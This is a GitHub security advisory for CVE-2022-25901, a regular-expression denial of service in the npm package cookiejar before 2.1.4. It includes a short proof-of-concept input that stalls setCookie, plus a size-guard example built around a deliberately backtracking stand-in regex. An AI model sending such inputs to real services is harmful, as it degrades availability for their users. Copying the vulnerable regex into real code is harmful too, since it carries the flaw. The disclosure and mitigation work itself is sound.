GHSA-h452-7996-h45h: cookiejar Regular Expression Denial of Service via Cookie.parse function

Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the Cookie.parse function and other aspects of the API, which use an insecure regular expression for parsing cookie values. Applications could be stalled for extended periods of time if untrusted input is passed as cookie values or parsed from request headers.

Proof of concept:

```ts
const { CookieJar } = require("cookiejar");

const jar = new CookieJar();

const start = performance.now();

// 50,001-character cookie string that contains no "=".
const attack = "a" + "t".repeat(50_000);
jar.setCookie(attack);

// Elapsed wall-clock time for the single setCookie() call.
console.log(`CookieJar.setCookie(): ${performance.now() - start}ms`);
```

```
CookieJar.setCookie(): 2963.214399999939ms
```
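
A size guard placed in front of a cookie parser, as an added example that is not code from cookiejar or from the advisory. `naiveParse`, `guardedParse`, `measure` and the 4096 limit are assumptions, and the regex is a constructed stand-in with quadratic backtracking, not the package's own expression.

```javascript
// Added example, not cookiejar's code: a size guard in front of a cookie parser.

// Assumed limit. RFC 6265 section 6.1 asks user agents to support at least
// 4096 bytes per cookie, so longer input can be refused before any regex runs.
// Length is counted in UTF-16 code units here, which is close enough for a cap.
const MAX_COOKIE_LENGTH = 4096;

// Constructed stand-in parser (hypothetical). Its regex backtracks
// quadratically when the input contains no "=".
function naiveParse(str) {
  const first = str.split(";")[0];
  const m = first.match(/([^=]+)=([\s\S]*)/);
  return m ? { name: m[1].trim(), value: m[2].trim() } : null;
}

// Refuse over-length input without ever calling the parser.
function guardedParse(str, parse = naiveParse, maxLength = MAX_COOKIE_LENGTH) {
  if (typeof str !== "string") {
    return { ok: false, reason: "not-a-string", cookie: null };
  }
  if (str.length > maxLength) {
    return { ok: false, reason: "too-long", cookie: null };
  }
  return { ok: true, reason: null, cookie: parse(str) };
}

// Time one parse call per size, using the input shape from the proof of concept.
function measure(parse, sizes) {
  return sizes.map((n) => {
    const input = "a" + "t".repeat(n);
    const start = performance.now();
    parse(input);
    return { n, ms: Math.round(performance.now() - start) };
  });
}

// Unguarded time grows roughly 4x per doubling; the guard rejects the 8000 case.
const sizes = [2000, 4000, 8000];
console.log("unguarded:", measure(naiveParse, sizes));
console.log("guarded:  ", measure((s) => guardedParse(s), sizes));
```

The guard bounds the worst case to the cost of parsing `MAX_COOKIE_LENGTH` characters; upgrading to the patched version listed in the advisory remains the actual fix.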
Moderate severity GitHub Reviewed Published Jan 18, 2023 • Updated Jan 23, 2023

Package

  • npm: cookiejar. Affected versions: < 2.1.4. Patched versions: 2.1.4
  • Maven: org.webjars.npm:cookiejar. Affected versions: <= 2.1.3. Patched versions: None

References

  • https://nvd.nist.gov/vuln/detail/CVE-2022-25901
  • bmeck/node-cookiejar#39
  • bmeck/node-cookiejar@eaa0002
  • https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3176681
  • https://security.snyk.io/vuln/SNYK-JS-COOKIEJAR-3149984
  • https://github.com/bmeck/node-cookiejar/blob/master/cookiejar.js#23L73

Severity

Moderate, 5.3 / 10

CVSS base metrics

  • Attack vector: Network
  • Attack complexity: Low
  • Privileges required: None
  • User interaction: None
  • Scope: Unchanged
  • Confidentiality: None
  • Integrity: None
  • Availability: Low

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Weaknesses

CWE-1333

CVE ID

CVE-2022-25901

GHSA ID

GHSA-h452-7996-h45h

Source code

bmeck/node-cookiejar

Credits

  • sno2

Related news

CVE-2022-25901: fix: add a guard against maliciously-sized cookies by andyburke · Pull Request #39 · bmeck/node-cookiejar

Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the Cookie.parse function, which uses an insecure regular expression.